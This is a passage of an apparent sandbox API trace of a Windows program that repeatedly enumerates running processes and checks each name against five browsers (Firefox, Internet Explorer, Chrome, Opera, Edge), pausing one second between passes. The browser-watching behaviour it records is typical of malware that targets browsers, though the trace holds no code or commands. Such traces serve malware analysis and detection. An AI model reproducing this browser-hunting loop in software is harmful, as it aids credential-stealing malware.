[0248.626] lstrcmpiA (lpString1="spicedespite.exe", lpString2="opera.exe") returned 1 [0248.626] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0248.626] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0248.627] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0248.627] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0248.627] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0248.627] lstrcmpiA (lpString1="wooden.exe", lpString2="opera.exe") returned 1 [0248.627] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0248.627] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0248.627] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0248.627] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0248.627] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0248.627] lstrcmpiA (lpString1="dallasr.exe", lpString2="opera.exe") returned -1 [0248.627] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0248.627] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0248.628] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0248.628] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0248.628] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0248.628] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="opera.exe") returned -1 [0248.628] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0248.628] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0248.628] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0248.628] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0248.628] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0248.628] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="opera.exe") returned -1 [0248.628] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0248.628] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0248.629] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0248.629] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0248.629] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0248.629] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="opera.exe") returned 1 [0248.629] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0248.629] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0248.629] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0248.629] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0248.630] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0248.630] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="opera.exe") returned -1 [0248.630] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0248.630] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0248.630] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0248.630] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0248.630] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0248.630] lstrcmpiA (lpString1="population openings.exe", lpString2="opera.exe") returned 1 [0248.630] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0248.630] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0248.631] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0248.631] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0248.631] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0248.631] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0248.631] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0248.631] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0248.631] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0248.631] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0248.631] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0248.631] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0248.631] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0248.631] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0248.632] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0248.632] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0248.632] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0248.632] lstrcmpiA (lpString1="sppsvc.exe", lpString2="opera.exe") returned 1 [0248.632] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0248.632] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0248.632] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0248.632] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0248.632] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0248.632] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0248.632] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0248.632] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0248.633] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0248.633] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0248.633] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0248.633] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0248.633] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0248.633] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0248.634] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0248.634] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0248.634] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0248.634] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0248.634] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0248.634] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0248.634] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0248.634] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0248.634] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0248.634] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0248.634] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0248.634] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0248.635] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0248.635] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0248.635] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0248.635] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0248.635] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0248.635] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0248.635] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0248.635] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0248.635] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0248.635] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0248.635] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0248.635] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0248.636] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0248.636] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0248.636] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0248.636] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0248.636] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0248.636] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0248.636] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0248.636] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0248.636] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0248.636] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0248.637] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0248.637] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0248.637] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0248.637] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0248.637] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0248.637] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0248.637] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0248.637] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x69006d, th32ProcessID=0x720063, th32DefaultHeapID=0x73006f, th32ModuleID=0x66006f, cntThreads=0x650074, th32ParentProcessID=0x670064, pcPriClassBase=6488165, dwFlags=0x2e0070, szExeFile="exe")) returned 0 [0248.638] CloseHandle (hObject=0xe8) returned 1 [0248.638] Sleep (dwMilliseconds=0x3e8) [0249.664] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0249.665] Process32First (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0249.666] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0249.666] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0249.666] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0249.666] lstrcmpiA (lpString1="[System Process]", lpString2="opera.exe") returned -1 [0249.666] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0249.666] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0249.666] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0249.666] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0249.666] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0249.666] lstrcmpiA (lpString1="System", lpString2="opera.exe") returned 1 [0249.666] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0249.666] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0249.667] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0249.667] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0249.667] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0249.667] lstrcmpiA (lpString1="smss.exe", lpString2="opera.exe") returned 1 [0249.667] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0249.667] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0249.667] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0249.667] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0249.667] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0249.667] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0249.668] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0249.668] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0249.668] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0249.668] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0249.668] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0249.668] lstrcmpiA (lpString1="wininit.exe", lpString2="opera.exe") returned 1 [0249.668] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0249.668] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0249.669] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0249.669] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0249.669] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0249.669] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0249.669] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0249.669] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0249.669] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0249.669] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0249.669] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0249.669] lstrcmpiA (lpString1="winlogon.exe", lpString2="opera.exe") returned 1 [0249.669] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0249.669] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0249.670] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0249.670] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0249.670] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0249.670] lstrcmpiA (lpString1="services.exe", lpString2="opera.exe") returned 1 [0249.670] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0249.670] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0249.670] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0249.670] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0249.670] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0249.670] lstrcmpiA (lpString1="lsass.exe", lpString2="opera.exe") returned -1 [0249.670] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0249.670] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0249.671] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0249.671] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0249.671] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0249.671] lstrcmpiA (lpString1="lsm.exe", lpString2="opera.exe") returned -1 [0249.671] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0249.671] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0249.672] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0249.672] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0249.672] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0249.672] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0249.672] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0249.672] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0249.672] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0249.672] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0249.672] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0249.672] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0249.672] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0249.672] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0249.673] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0249.673] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0249.673] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0249.673] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0249.673] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0249.673] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0249.673] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0249.673] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0249.673] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0249.673] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0249.673] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0249.673] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0249.674] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0249.674] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0249.674] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0249.674] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0249.674] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0249.674] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0249.674] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0249.674] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0249.675] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0249.675] lstrcmpiA (lpString1="audiodg.exe", lpString2="opera.exe") returned -1 [0249.675] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0249.675] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0249.675] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0249.675] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0249.675] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0249.675] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0249.675] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0249.675] Process32Next (in: 